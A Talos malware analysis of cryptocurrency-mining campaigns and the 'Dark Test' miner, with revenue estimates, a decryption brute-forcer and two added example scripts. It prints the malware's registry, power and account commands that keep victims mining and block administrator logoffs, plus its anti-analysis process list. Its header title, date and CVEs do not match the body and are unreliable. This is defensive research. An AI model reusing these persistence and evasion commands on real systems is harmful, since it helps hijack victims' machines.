44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L

_Source: Cisco Talos blog, "Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”", published 2019-09-17; CVEs referenced: CVE-2017-10271, CVE-2017-5638, CVE-2019-2725; original URL: http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html_

## The Dark Side of the Digital Gold Rush

_This post was
authored by [Nick Biasini](<https://twitter.com/infosec_nick>), [Edmund Brumaghin](<https://www.blogger.com/profile/10442669663667294759>), [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and [Josh Reynolds](<https://www.twitter.com/JershMagersh>) with contributions from [Azim Khodijbaev](<https://twitter.com/ashukuhi>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._

[](<https://1.bp.blogspot.com/-arFNhXlv5Mw/WnHgQ5o5WDI/AAAAAAAABpc/R8cgpTc4WnsyovMYujbV815KaTNd1mQgwCLcBGAs/s1600/pan-gold_transp.png>)

## Executive Summary

The threat landscape is constantly changing; over the last few years malware threat vectors, methods and payloads have rapidly evolved. Recently, as cryptocurrency values have exploded, mining-related attacks have emerged as a primary interest for many attackers, who are beginning to recognize that they can realize all of the financial upside of previous attacks, like ransomware, without needing to engage the victim and without the law enforcement attention that ransomware attacks attract.

This focus on mining isn't entirely surprising, considering that various cryptocurrencies, along with "blockchain", have been all over the news as the value of these currencies has increased exponentially. Adversaries have taken note of these gains and have been creating new attacks that help them monetize this growth. Over the past several months, Talos has observed a marked increase in the volume of cryptocurrency mining software being maliciously delivered to victims.

In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom. Instead, attackers are actively leveraging the resources of infected systems for cryptocurrency mining.
In these cases, the better the performance and computing power of the targeted system, the better for the attacker from a revenue-generation perspective. IoT devices, with their lack of monitoring and lack of day-to-day user engagement, are fast becoming an attractive target for these attackers, as they offer processing power without direct victim oversight. While the computing resources within most IoT devices are generally limited, the number of exposed devices that are vulnerable to publicly available exploits is high, which may make them attractive to cyber criminals moving forward.

To put the financial gains in perspective, an average system would likely generate about $0.25 of Monero per day, meaning that an adversary who has enlisted 2,000 victims (not a hard feat) could generate $500 per day, or $182,500 per year. Talos has observed botnets consisting of millions of infected systems, which, following the same logic, could theoretically be leveraged to generate more than $100 million per year. It is important to note that due to the volatility of cryptocurrency markets, these values may change drastically from day to day. All calculations in this blog were made based on XMR/USD at the time of this writing.

This is all done with minimal effort following the initial infection. More importantly, with little chance of being detected, this revenue stream can continue in perpetuity. While these are impressive figures, it's also important to factor in a few details that can further increase the value of these attacks:

 * The value of many cryptocurrencies is skyrocketing. Monero, one of the most popular mining targets, saw a 3000% increase over the last 12 months.
 * These attacks are much stealthier than their predecessors.
Attackers are not stealing anything more than computing power from their victims, and the mining software isn't technically malware, so theoretically the victims could remain part of the adversary's botnet for as long as the attacker chooses.
 * Once the currency is mined, there is no telling what the attacker might do with it. This could become a long-term investment (or even retirement) scheme for these attackers, sitting on the currency until it reaches a point where the attacker decides to cash in.

## Introduction

Throughout the past couple of years, ransomware has dominated the threat landscape, and for good reason. It creates a highly profitable business model that allows attackers to directly monetize their nefarious activities. However, there are a couple of limitations to the use of ransomware. First, only a small percentage of infected users will actually pay the ransom demanded by the attacker. Second, as systems and technology get better at detecting and blocking ransomware attacks, the pool of possible victims is changing. Potential victims in many countries lack the financial capability to pay $300-$500 to retrieve their data. Possibly related to these limitations, we have begun to see a steady shift in the payloads that are being delivered. This is especially true for some of the most common methods of malware distribution, such as exploit kits and spam campaigns.

Over the past several months, Talos has observed a marked increase in the volume of cryptocurrency miners being delivered to victims. Cryptocurrency and "blockchain" have been all over the news as the value of these currencies has increased on an exponential path. One of the most effective ways to generate these currencies is through mining, and adversaries are obviously paying attention.
## What is 'Mining'?

At a high level, mining is simply using system resources to solve computationally expensive hashing puzzles, with some amount of cryptocurrency awarded to whoever finds a solution. Before we get too deep into mining, let's address which currencies make sense to mine.

Bitcoin (BTC) is the most well-known and widely used cryptocurrency by a wide margin. It has been mined since its inception, but today mining it on ordinary hardware isn't an effective way to generate value. If you look across all of the cryptocurrencies, there are only a couple that are worth mining without specialized hardware called ASICs (Application Specific Integrated Circuits). The differences between cryptocurrencies in this respect come down to the hashing algorithm used: some have been specifically designed to prevent or hinder the use of such specialized hardware and are instead aimed at consumer-grade equipment such as CPUs and GPUs. Currently, the most valuable currency to mine with standard systems is Monero (XMR), and adversaries have done their research. In addition, Monero is extremely privacy-conscious, and as governments have started to scrutinize Bitcoin more closely, Monero and other coins with a heavy emphasis on privacy may become a safe haven for threat actors.

There are two ways that mining can be performed: either with a stand-alone miner or by joining a mining pool. Pool-based mining combines the hashing of many systems into one higher hashrate; the pool does not raise the expected yield per hash, but it turns the rare chance of finding a whole block into a steady stream of small payouts, which is exactly what an attacker running many modest machines wants. It's pool-based mining of Monero that we have seen most frequently leveraged by attackers, as it allows for the greatest return on investment and the required mining software can be easily delivered to victims. The use of pooled mining also maximizes the effectiveness of the computing resources found in the standard systems that attackers compromise.
This is similar to launching Distributed Denial of Service (DDoS) attacks, where 100,000 machines flooding a target with bogus traffic is far more effective than a single system under the attacker's control doing the same.

## How does pool based mining work?

Pool-based mining is coordinated through the use of 'Worker IDs'. These IDs tie an individual system to a larger pool and ensure that the coin mined by the pool under a particular Worker ID is delivered to the correct user. It's these Worker IDs that allowed us to determine the size and scale of some of the malicious operations, as well as get an idea of the amount of revenue adversaries are generating. For the purposes of this discussion we will assume the following:

 1. The number of hashes per second that a typical computer can compute will be assumed to be ~125 H/s.
 2. While in reality mining does not always guarantee successful generation of the cryptocurrency being mined, we will assume that for our purposes it is successful, as it allows for a better understanding of the earning potential of these malicious mining pools.

These miners typically operate from the command line and make use of a series of arguments that establish how the mining should be performed. A typical example of the command-line syntax used to execute the mining software and specify the arguments is below (note that the parameter names vary between mining programs):

[](<https://2.bp.blogspot.com/-ZmEzpdA1pzU/WnG17Z6ncAI/AAAAAAAAAkM/v_-jqvA3Tx4v4Ifg6PSTn6xHAxs92brwgCLcBGAs/s1600/image7.png>)

**Example Command Line Syntax**

As you can see, there are two primary argument values required: the URL of the mining pool, and the 'Worker ID' that ties the mining activity taking place on the system to a specific account at the pool, which is what the pool uses to manage payouts.
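As an added example (not code from this post), the following Python pulls the two arguments just described, the pool URL and the Worker ID, out of an xmrig-style miner command line, and turns an observed pool hashrate into the rough victim count and daily revenue that the assumptions above (~125 H/s and ~$0.25 per host per day) imply. It goes slightly beyond the figure: it also records the throttling flags discussed next. The flag spellings follow xmrig and cpuminer; the sample command line is constructed and its wallet value is a placeholder, not a real address.

```python
"""Parse the arguments a pool miner is launched with and size the operation.

Added example, not code from the Talos post. The flag spellings are the common
xmrig / cpuminer ones; the sample command line is constructed and the wallet
value is a placeholder, not a real address.
"""
import shlex

POOL_FLAGS = {"-o", "--url"}
USER_FLAGS = {"-u", "--user"}          # the Worker ID (wallet, optionally wallet.worker)
PASS_FLAGS = {"-p", "--pass"}
# Flags used to keep the miner below the victim's notice: CPU caps, thread counts, pauses.
THROTTLE_FLAGS = {"--max-cpu-usage", "--cpu-max-threads-hint", "-t", "--threads",
                  "--cpu-priority", "--pause-on-battery", "--pause-on-active"}

# Constructed sample: a 50% CPU cap and two threads so the victim feels nothing.
SAMPLE_CMDLINE = ("xmrig.exe -o stratum+tcp://pool.minexmr.com:4444 "
                  "-u WALLET_ADDRESS_PLACEHOLDER -p x --max-cpu-usage=50 -t 2 --donate-level 1")

def _next_flag(argv, i):
    """Return (flag, value, next index), accepting both '--flag=value' and '--flag value'.
    A bare boolean flag followed by a non-dash token is read as taking that token."""
    arg = argv[i]
    if arg.startswith("--") and "=" in arg:
        flag, value = arg.split("=", 1)
        return flag, value, i + 1
    if i + 1 < len(argv) and not argv[i + 1].startswith("-"):
        return arg, argv[i + 1], i + 2
    return arg, None, i + 1

def parse_miner_cmdline(cmdline):
    """Extract pool host/port, Worker ID, password and throttling flags from a miner command line."""
    argv = shlex.split(cmdline)
    info = {"pool_host": None, "pool_port": None, "worker_id": None,
            "password": None, "throttle": {}}
    i = 0
    while i < len(argv):
        flag, value, i = _next_flag(argv, i)
        if flag in POOL_FLAGS and value:
            url = value.split("://", 1)[-1]            # drop stratum+tcp:// and friends
            host, sep, port = url.rpartition(":")
            info["pool_host"] = host if sep else url
            info["pool_port"] = int(port) if sep and port.isdigit() else None
        elif flag in USER_FLAGS:
            info["worker_id"] = value
        elif flag in PASS_FLAGS:
            info["password"] = value
        elif flag in THROTTLE_FLAGS:
            info["throttle"][flag] = value
    return info

def estimate_hosts(pool_hashrate_hs, per_host_hs=125):
    """Rough number of victims behind a Worker ID, using the post's ~125 H/s per average host."""
    return round(pool_hashrate_hs / per_host_hs)

def estimate_daily_usd(pool_hashrate_hs, usd_per_host_day=0.25, per_host_hs=125):
    """Daily revenue using the post's ~$0.25 per host per day at the XMR price of its writing."""
    return pool_hashrate_hs / per_host_hs * usd_per_host_day

if __name__ == "__main__":
    print(parse_miner_cmdline(SAMPLE_CMDLINE))
    for rate in (55_200, 350_000):
        print(f"{rate / 1000:.1f} KH/s ~ {estimate_hosts(rate)} hosts, ~${estimate_daily_usd(rate):.0f}/day")
```

Fed the 350 KH/s Worker ID discussed later in the post, the estimate comes out at about 2,800 hosts and $700 a day, in line with the $704 figure the post obtains from an online calculator; the 55.20 KH/s worker maps to roughly 440 hosts.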
However, through our investigation we have found a plethora of other parameters that attackers can specify in an attempt to hide their activity. If the mining software is executed without these options, victims might notice significant performance degradation on their systems, as no computing resource limits are enforced. These options include:

 * Limits on CPU usage.
 * Limits on system temperature.
 * The number of cores being used.
 * Sleep periods.

Each mining program comes with its own set of flags, which are taken advantage of in various ways by both legitimate and malicious miners. We have observed that these options are typically deployed by the attackers when they establish persistence (e.g., through the creation of Scheduled Tasks or Run keys that execute the miner via the Windows Command Processor with the chosen arguments).

## Origins on the Underground

Talos has been observing discussions regarding the use of crypto miners as malicious payloads by both Chinese and Russian crimeware groups. We first observed Chinese actors discussing miners and the associated mining botnets in November 2016, and interest has been steadily building since that time.

From a Russian underground perspective, there has been significant movement related to mining in the last six months, with numerous discussions and several offerings on top-tier Russian hacking forums. The discussions have been split between the sale of access to mining bots and bot developers looking to buy access to compromised hosts for the purpose of leveraging them for crypto mining. The increase in popularity has also been accompanied by a learning curve associated with mining, including a better understanding of how much coin can be mined and the opportune times to conduct the mining activity.
As for the malware used to conduct mining, most of it is written in C# or C++, and, as is common on these forums, it is advertised with a low detection rate, persistence, and constant development. In many cases we are observing updates to these threats on a daily or weekly basis.

In general, the attackers have been pleased with the amount of revenue the bots generate, as well as the potential to grow that revenue. This is indicative of a threat that is poised to become more pervasive over time. Let's take a look at how malicious mining works and the threats that deliver it.

## Malicious Mining

Malicious mining is the focus of this post since it's an emerging trend across the threat landscape. Adversaries are always looking for ways to monetize their nefarious activities, and malicious mining is quickly becoming a cash cow for the bad guys.

Over the past several years, ransomware has dominated the threat landscape from a financially motivated malware perspective, and with good reason. It is an extremely profitable business model, as we've shown through our Angler Exploit Kit [research](<https://www.talosintelligence.com/angler-exposed/>), where we estimated that the adversaries behind Angler could conservatively have been making at least $30 million annually. However, with success comes attention, and with that attention came an increased focus on stopping this type of activity. Both operating systems and security vendors got better at stopping ransomware before it affected much of the system.

Adversaries are left with an interesting decision: continue leveraging ransomware as a primary source of revenue as the pool of users and vulnerable systems continues to shrink, or begin leveraging other payloads. There is no shortage of options available to the bad guys, including banking trojans, bots, credential stealers, and click-fraud malware, to name a few.

So why choose crypto mining software?
There are many reasons why adversaries might choose crypto mining to generate revenue. One likely reason is that it is a largely hands-off infection to manage. Once a miner has been dropped on a system and starts mining, nothing else is needed from the adversary: there is no command and control traffic to maintain, and the miner generates revenue consistently until it is removed. If an adversary notices a drop-off in nodes mining to their pool, it's time to infect more systems. Another reason is that mining goes largely unnoticed by the majority of users. Is a user really going to notice that mining is going on while they are reading their email, browsing the web, or writing up their latest proposal? From this perspective miners are the polar opposite of ransomware, staying below the user's notice for as long as possible. The longer the user doesn't notice the miner running, the larger the potential payout.

The biggest reason of all is the potential monetary payout associated with mining activity. If it didn't generate a profit, the bad guys wouldn't take advantage of it. In this particular vein, malicious miners could be a pretty large source of revenue. The biggest costs associated with mining are the hardware to mine with and the electricity to power it. By leveraging malicious miners, attackers take both of those costs out of the equation altogether: since they are using the computing resources of infected systems, there is no cost for power or hardware, and the attackers receive all the benefits of the mined coin.

Let's take a deeper dive into the amount of revenue these systems can potentially generate. As mentioned earlier, the hashrate of a computer can vary widely depending on the hardware being used and the average system load outside of the miner. An average system would likely compute somewhere around 125 hashes per second.
One system alone, with no hardware or electricity cost to the attacker, would generate about $0.25 of Monero a day, which doesn't seem like a lot, but when you start pooling systems the earning potential increases rapidly.

Some of the largest botnets across the threat landscape consist of millions of infected systems under the control of an attacker. Imagine controlling a small fraction of the systems that are part of one of these botnets (~2,000 hosts). The amount of revenue that can be generated per day increases considerably, to more than $500 in Monero per day or $182,500 per year. As we will demonstrate later in the post, we have seen malicious pools that far exceed the 250 KH/s (2,000 hosts at ~125 H/s each) necessary to generate this type of revenue.

In one campaign that we analyzed, the attacker had managed to amass enough computing resources to reach a hash rate of 55.20 KH/s. As can be seen in the screenshot below, the Total Paid value was 528 XMR, which converts to approximately $167,833 USD. In this particular case the mining pool realized that the 'Worker ID' was being used by a botnet to mine Monero.

[](<https://3.bp.blogspot.com/-MG_1-PGHnRc/WnG2S4DYdCI/AAAAAAAAAkQ/wm5t4BG-cyQT8H5R0SvXpiTP-vQ0i2CKQCLcBGAs/s1600/image21.png>)

**Worker ID Statistics**

In a series of attacks that we observed beginning at the end of December 2017, attackers were leveraging exploits targeting Oracle WebLogic vulnerabilities (CVE-2017-3506 / CVE-2017-10271). In these cases, successful exploitation would often lead to the installation and execution of mining software.

[](<https://4.bp.blogspot.com/-M5-8y8Fx7Yo/WnG2YgVvaQI/AAAAAAAAAkU/ZVgb1EDHpsERm40rt653hTMYUH1Qvh51ACLcBGAs/s1600/image31.png>)

**Historical Hash Rate**

In analyzing the size and scope of this campaign, we observed that shortly after these attacks began, the 'Worker ID' being used was generating over 500 KH/s. At the time of this writing, this particular attacker is still generating approximately 350 KH/s.
[](<https://3.bp.blogspot.com/-pjStDnu5oE8/WnG2d2dGbvI/AAAAAAAAAkY/Rxy4y24ajzQfDgPsl0EfQA9VeuZ5BDQegCLcBGAs/s1600/image11.png>)

**Current Hash Rate**

Using an online calculator that takes hash rate, power consumption and cost and estimates profitability, a hash rate of 350 KH/s gives an estimated 2.24 XMR mined per day. This means that an attacker could generate approximately $704 USD per day, which equals $257,000 per year. This clearly indicates how lucrative this sort of operation can be for attackers.

Analyzing the statistical data and payment history associated with this 'Worker ID' shows that a total of 654 XMR have been received. At the time of this writing, that would be worth approximately $207,884.

[](<https://2.bp.blogspot.com/-cBKLUb4FJsY/WnG2jRgOLaI/AAAAAAAAAkc/vkIhD0cKfXUcw-bRIzTnENRE5fY7kDHTACLcBGAs/s1600/image5.png>)

**Worker ID Payment History**

While analyzing the malware campaigns associated with the distribution of mining software, we identified dozens of high-volume 'Worker IDs'. Taking a closer look at five of the largest operations we analyzed shows just how much money can be made by taking this approach.

[](<https://3.bp.blogspot.com/-iFc7bTVYL4I/WnG3Ofd1fiI/AAAAAAAAAkw/OW1LuQqLbnYWaFFq3VVfkq-rxkwbhPc4ACLcBGAs/s1600/table.png>)

**High Volume Calculations**

One additional benefit is that the value of the Monero mined has continued to rise over time. Much like Bitcoin, Monero's valuation has exploded over the last year, from $13 in January 2017 to over $300 at the time of this article, and at times it has approached $500. As long as the cryptocurrency craze continues and the value keeps increasing, every piece of cryptocurrency mined increases in value, which in turn increases the amount of revenue generated.
That covers some of the financial reasons adversaries leverage malicious mining, but how are these miners getting onto systems in the first place?

## Threats Delivering Miners

Cryptocurrency miners are a new favorite of miscreants and are being delivered to end users in many different ways. The common ways we have seen miners delivered include spam campaigns, exploit kits, and direct exploitation.

### Email Based

There are ongoing spam campaigns that deliver a wide variety of payloads such as ransomware, banking trojans, miners, and much more. Below are examples of campaigns we've seen delivering miners. The way these infections typically work is that a user is sent an email with an attachment. These attachments typically contain an archive holding a Word document that downloads the miner via a malicious macro, or an archive that unpacks an executable that initiates the mining infection. In many of the campaigns Talos observed, the included binary is a widely distributed Monero miner executed with the miscreant's worker ID and pool, allowing attackers to reap the mining benefits.

Below is an example, from late 2017, of one of these campaigns. It's a job-application spoof that includes a Word document purporting to be the resume of a potential candidate.

[](<https://3.bp.blogspot.com/-HN1jDjRs9NA/WnG3ofsv07I/AAAAAAAAAk0/4X5qS3uMf18a-Kp7PAKUc-glbFynIHzSQCLcBGAs/s1600/image24.png>)

**Example Malicious Email**

As you can see, the email contains a Word document which, when opened, looks like the following.

[](<https://2.bp.blogspot.com/-YCNN3stnTLI/WnG3utpzHHI/AAAAAAAAAk4/cCbjw9yYuCgHf0Q5TZgqKlXA6OBCPxb_ACLcBGAs/s1600/image4.png>)

**Example Word Document**

As is common for malicious Word documents, opening the document results in a file being downloaded. This is an example of a larger miner campaign dubbed 'bigmac' based on the naming conventions used.
This image entices the user to enable macro content within the document, which is blocked by default. Once clicked, Word executes a series of highly obfuscated VBA macros from the Document_Open function:

[](<https://4.bp.blogspot.com/-dyl8BOtHiUE/WnG303uF5iI/AAAAAAAAAk8/B-VcgP43bnU3nMYcTAfcxrp_IwAxif2ewCLcBGAs/s1600/image22.png>)

**Highly Obfuscated VBA Macros Using Document_Open()**

The macro leads to a call to a Shell command:

[](<https://1.bp.blogspot.com/-XOkkw3a6yUE/WnG4AVkCURI/AAAAAAAAAlA/VrDifm1A5oovDdn32WTa6HO76vUcmQJtQCLcBGAs/s1600/image32.png>)

**Highly Obfuscated VBA Macro VBA.Shell Call**

We can see what is executed by this command after it is de-obfuscated by passing the first parameter to a MsgBox call instead of Shell:

[](<https://2.bp.blogspot.com/--COaPZAv6Ew/WnG4LxL9dfI/AAAAAAAAAlE/GYytdgVpwOsm3yOL6Zh-z_UQAvlPFI6AQCLcBGAs/s1600/image30.png>)

**MsgBox for Shell Replacement**

This retrieves an executable remotely using System.Net.WebClient and executes it using Start-Process. This can also be seen through the dynamic activity in Threat Grid:

[](<https://2.bp.blogspot.com/-mmTPAo0x4MQ/WnG4WK_-dTI/AAAAAAAAAlQ/J_DdWb9W-BsYAda0piFe3P56gM_gGVrTQCLcBGAs/s1600/image10.png>)

**Office Document Launches a PowerShell Indicator in Threat Grid**

We also see that the downloaded binary attempts to masquerade as an image through its file extension:

[](<https://2.bp.blogspot.com/-YzD2ro54GK0/WnG5aJkJG5I/AAAAAAAAAlg/0ehj3iBDLigETrSyPdQvkcM7NJB5qr7OwCLcBGAs/s1600/image19.png>)

**Portable Executable Image Extension Identification in Threat Grid**

In this case the binary that is downloaded is a portable executable written in VB6 that executes a variant of the xmrig XMR CPU miner.
This activity can be seen dynamically within Threat Grid:

[](<https://3.bp.blogspot.com/-oAAn84JRp6M/WnG5k-T3a2I/AAAAAAAAAlk/RrVDgGKgj90yTIzm_Bap_fG6o9T89qdgwCLcBGAs/s1600/image20.png>)

**xmrig Execution in Threat Grid**

Dynamic miner activity can also be observed within the AMP for Endpoints product line. An example can be seen below within the portal's Device Trajectory:

[](<https://1.bp.blogspot.com/-AniIUgZrSrA/WnG5ui4mMwI/AAAAAAAAAlo/SgG7inliyH8OQPc9WLo_oug-1ct2g04dwCLcBGAs/s1600/image13.png>)

**Dynamic Miner Execution in AMP for Endpoints' Device Trajectory**

Mining network traffic can also be classified using Cognitive Threat Analytics to identify miners within enterprise environments:

[](<https://4.bp.blogspot.com/-TJimRD6275k/WnG53Hz4rCI/AAAAAAAAAls/8Ahjkqr-spA-ffuY1RQ0SWRpZ2dkQnDegCLcBGAs/s1600/image12.png>)

**Mining Traffic Classification using Cognitive Threat Analytics**

### Dark Test Cryptomining Malware

Dark Test (the name is taken from the decompiled source code) is an example of cryptomining malware written in C# that drops a UPX-packed variant of the xmrig XMR CPU miner. Being written in C#, the binary contains .NET IL (Intermediate Language), which can be decompiled back into source code. The C# code is highly obfuscated, with an encrypted resource section holding all referenced strings and functions that are resolved at runtime. The following section discusses these techniques in detail.

### Dark Test Obfuscation

Dark Test makes use of a packer which, after unpacking, creates a suspended copy of itself using CreateProcessA and overwrites that process's memory with the unpacked version of the binary using WriteProcessMemory (the classic process-hollowing pattern). The original binary can be recovered simply by setting a breakpoint on WriteProcessMemory within a debugger and dumping nSize bytes starting from the address in lpBuffer.
Dark Test contains highly obfuscated C# code made up of a large amount of garbage instructions, arithmetic for branching to varying code sections, encrypted strings stored within its resource section, and functions that are resolved at runtime. Functions are resolved on load using arithmetic operations whose result is the metadataToken passed to Method.ResolveMethod and MethodHandle.GetFunctionPointer:

[](<https://2.bp.blogspot.com/-FW3xpQMFWTQ/WnG5_oHjZ7I/AAAAAAAAAlw/BiZn3XD0hlwNOu4QsRcNJPWt6FsOLshjwCLcBGAs/s1600/image29.png>)

**Dynamic Method Resolution Using metadataToken Integer**

Functions are also indirectly called using the calli instruction, which is passed a pointer to the entry point of a function along with its parameters:

[](<https://4.bp.blogspot.com/-BxKE4FUS_xo/WnG6HeOmbpI/AAAAAAAAAl0/iH44lM8q1Wo8CMZE61rxRgNrfLeUs_IeQCLcBGAs/s1600/image6.png>)

**Runtime Resolved Function Calls using calli**

The decryption function takes three integer parameters. The first two make up the seek offset of the length and offset of the string to be decrypted, and the third is the XOR key for the string at this offset:

[](<https://2.bp.blogspot.com/-5fAlSxHtsCs/WnG6PTD63ZI/AAAAAAAAAl8/WSBazviqxpMRnVke6nqudB0XZFWbrfDGgCLcBGAs/s1600/image27.png>)

**Dark Test String Decryption Function**

At the calculated offset, the first four bytes are the offset of the ciphertext and the next four are the length of the string being decrypted. The function then iterates over this length in an XOR loop to decrypt the string at that offset.
These integer parameters are calculated at runtime, typically through a series of arithmetic operations and referenced runtime objects:

[](<https://3.bp.blogspot.com/-QHHC8NNpqhs/WnG6WuFY_3I/AAAAAAAAAmE/vyUgwV2z5egBm1veQbHpnJzX2_YsHa4agCLcBGAs/s1600/image17.png>)

**Dark Test String Decryption Function Call**

The result in this case is the string "-o pool.minexmr.com:4444 -u", which is the domain and port combination for the mining pool the miner is participating in, followed by the username parameter without a value. Although these strings are decrypted at runtime, they are easily seen through the dynamic activity execution within Threat Grid (in this case another pool is chosen from the config for use):

[](<https://3.bp.blogspot.com/-Bnn3A7ixXqo/WnG6dckoDWI/AAAAAAAAAmI/TmyF9F_Qr5Ms7ycfr9SXEoE4p9N68VaCgCLcBGAs/s1600/image2.png>)

**Dynamic Miner Activity Command Line Arguments**

Runtime resolved objects and functions make it difficult to extract all strings, as the decompilation is not always perfect, and not all strings are decoded during dynamic analysis because of different code branches (as seen in the example above). The num6 length calculation produces three unique bytes (in decimal), [106, 242, 28], for each length. The result is that we can search for these bytes (the first three of the length calculation) to find runtime calculated offsets.
Once we know the length we can glean the ciphertext offset from the previous four bytes, and then brute force the XOR key at this offset by iterating over all possibilities and checking for resulting valid ASCII ranges:

    #!/usr/bin/ruby
    # Scan a Dark Test resource section for the egg left by its length
    # arithmetic, recover the ciphertext offset, and brute force the XOR key.
    fb = File.binread(ARGV[0]).bytes

    (5..fb.length - 4).each do |i|
      # Through their obfuscation technique we get an egg for obfuscated
      # string lengths and offsets to find in the resource
      next unless fb[i] == 106 && fb[i + 1] == 242 && fb[i + 2] == 28

      # Perform their arithmetic: the four bytes form a little-endian 32-bit int
      length = ([fb[i - 1], 106, 242, 28].pack("C*").unpack1("V") - 5) ^ 485648943
      seek_offset_bytes = fb[i - 5, 4]
      seek_offset = (seek_offset_bytes.pack("C*").unpack1("V") ^ 2100157544) - 100
      puts "Found length of: #{length}"
      puts "Seek offset bytes: #{seek_offset_bytes.inspect}"
      # Skip lengths too short to judge by character range, and offsets
      # that would run past the end of the resource
      next if length <= 2 || seek_offset < 0 || seek_offset + length > fb.length

      ciphertext = fb[seek_offset, length]
      # Try every single-byte key; keep the ones that yield only printable ASCII
      (0x00..0xFF).each do |x|
        result = ciphertext.map { |c| x ^ c }
        next unless result.all? { |b| b.between?(0x20, 0x7E) }
        puts "Found possible XOR key for string: #{result.pack("C*")} of length: #{length}"
      end
    end

This brute force approach produces some invalid results, but it also yields clear-text strings after manual review, all of which are available in the appendix. Some interesting strings to highlight are those intended to keep the computer online to continue mining:

    /C net accounts /forcelogoff:no

This prevents forced logoffs from remote administrators.

    /C net accounts /maxpwage:unlimited

This sets the maximum password age to unlimited, which in turn prevents password expiry.
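The string-decryption scheme described above (an eight-byte table entry holding the ciphertext offset and length, followed by a single-byte XOR loop) and the printable-ASCII brute force the script relies on, as an added model in Ruby. This is not Dark Test's code and not the post's script. Two assumptions are made because the post does not pin them down: the two integers that "make up" the seek offset are simply summed, and the per-string keys are made up; the resource section is constructed from strings quoted in the post.

```ruby
# Added example: a model of the Dark Test string-decryption scheme described
# above, run on a constructed resource section. Not Dark Test's code and not
# the post's script. Assumptions: each table entry is [offset:4 LE][length:4 LE],
# the two integers forming the seek offset are summed, and keys are made up.

# Build a constructed resource: an entry table followed by the XOR-encrypted
# strings. Each string gets its own single-byte key.
def build_resource(strings_with_keys)
  table_size = 8 * strings_with_keys.length
  table = "".b
  data  = "".b
  strings_with_keys.each do |s, key|
    ciphertext_offset = table_size + data.bytesize
    table << [ciphertext_offset, s.bytesize].pack("VV")
    data  << s.bytes.map { |c| c ^ key }.pack("C*")
  end
  table + data
end

# The decryption routine as the post describes it: (a, b) form the seek
# offset into the table, k is the XOR key for the string at that entry.
def decrypt_string(resource, a, b, k)
  entry = resource.byteslice(a + b, 8)
  return nil unless entry && entry.bytesize == 8
  off, len = entry.unpack("VV")
  ct = resource.byteslice(off, len)
  return nil unless ct && ct.bytesize == len
  ct.bytes.map { |c| c ^ k }.pack("C*")
end

# Analyst-side recovery when the key is unknown: try every single-byte key and
# keep the candidates whose plaintext is entirely printable ASCII (0x20..0x7E).
# Short strings are skipped because almost any key passes the range test.
def brute_force_entry(resource, seek)
  entry = resource.byteslice(seek, 8)
  return [] unless entry && entry.bytesize == 8
  off, len = entry.unpack("VV")
  ct = resource.byteslice(off, len)
  return [] if len < 3 || ct.nil? || ct.bytesize != len
  (0x00..0xFF).each_with_object([]) do |k, found|
    pt = ct.bytes.map { |c| c ^ k }
    found << [k, pt.pack("C*")] if pt.all? { |b| b.between?(0x20, 0x7E) }
  end
end

# Strings quoted in the post, encrypted here under constructed keys.
SAMPLE = build_resource([
  ["-o pool.minexmr.com:4444 -u",     0x5A],
  ["/C net accounts /forcelogoff:no", 0xC3],
  ["procexp",                         0x11],
])

if __FILE__ == $0
  puts decrypt_string(SAMPLE, 0, 0, 0x5A)   # entry 0 with its known key
  brute_force_entry(SAMPLE, 16).each { |k, s| puts format("key 0x%02x -> %s", k, s) }
end
```

The brute force on the short "procexp" entry returns several printable candidates besides the real key, which is the manual-review step the post mentions; longer strings such as the pool argument leave far fewer survivors.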
    /C powercfg /x /standby-timeout-ac 0

This will prevent the computer from entering standby mode, thus continuing mining operations when the computer is idle.

    /C reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 600000000 /f

This will prevent the screensaver from starting.

Further observed strings are those for anti-analysis:

    procexp
    PROCEXP
    pROCESShACKER
    ProcessHacker
    procexp64
    Detect detector!
    Clear!
    taskmgr

### Dark Test Network Traffic

Two GET requests are sent to api.ipfy.org, used for public IP address identification. This is then followed by a GET request to qyvtls749tio[.]com which sends HwProfileInfo.szHwProfileGuid for identification, a 64-bit flag, a video card parameter (which is always null), and the number of CPU cores. The server response provides youronionlink[.]onion URL locations of two executable files: bz.exe and cpu.zip

[](<https://3.bp.blogspot.com/-Qc4_UEtvGbQ/WnG6t_zCEDI/AAAAAAAAAmU/Tbbi2yeKVKkhvIOmytvbMe3huDcz2cZJwCLcBGAs/s1600/image18.png>)

**Dynamic Miner Activity Command Line Arguments**

Oddly enough this is not a valid .onion address, and is likely a placeholder from the server for this dropper, or a kiddie who set this up without replacing what the gateway was returning to the dropper on request. When searching for this pattern we came across a valid pastebin address containing a number of SQL commands for setting up a database with these domains, with Russian comments:

[](<https://1.bp.blogspot.com/-8Tjmvd6M01E/WnG61VY3rZI/AAAAAAAAAmc/jUfzdPmMu38oApQ9rKvbqIutNJdpdgttQCLcBGAs/s1600/image33.png>)

**Pastebin SQL Commands**

This further implies the possibility of a builder or distributed gateway being used.
Further searches turned up a number of in-the-wild filenames which correspond to warez:

[](<https://3.bp.blogspot.com/-lPM4zO7Yy-I/WnG6-j_QqsI/AAAAAAAAAmg/eb6YMKLP9m02kqcHC39H5BowbycRyZLmgCLcBGAs/s1600/image15.png>)

**Dark Test VirusTotal Observed in-the-wild Filenames**

This could indicate warez as being a possible distribution vector for this malware.

### Dark Test Version 2

Throughout the month of November, we started observing a sample with the same command and control parameters, mining pool, and persistence executable name as Dark Test. However, it did not drop and execute a separate xmrig binary but contained a statically linked version instead. Due to the attributes shared with the first version of Dark Test, we believe this is a new iteration written in Visual C++ rather than C#. The binary is shipped within an NSIS self-extracting installer, which launches unpacking code that writes into a newly spawned suspended process and resumes its main thread. A notable difference is a more extensive list of anti-analysis strings, which are searched for using Process32FirstW:

[](<https://3.bp.blogspot.com/-yMVA8UyzTPM/WnG7LBRPlAI/AAAAAAAAAmk/F1xZeoz6HuQ9IfwbpwapLaZ_XfFKSbucgCLcBGAs/s1600/image14.png>)

**Anti-Analysis Strings**

An interesting addition is vnc.exe, possibly to detect VPS or analysis systems that are connected to using VNC.

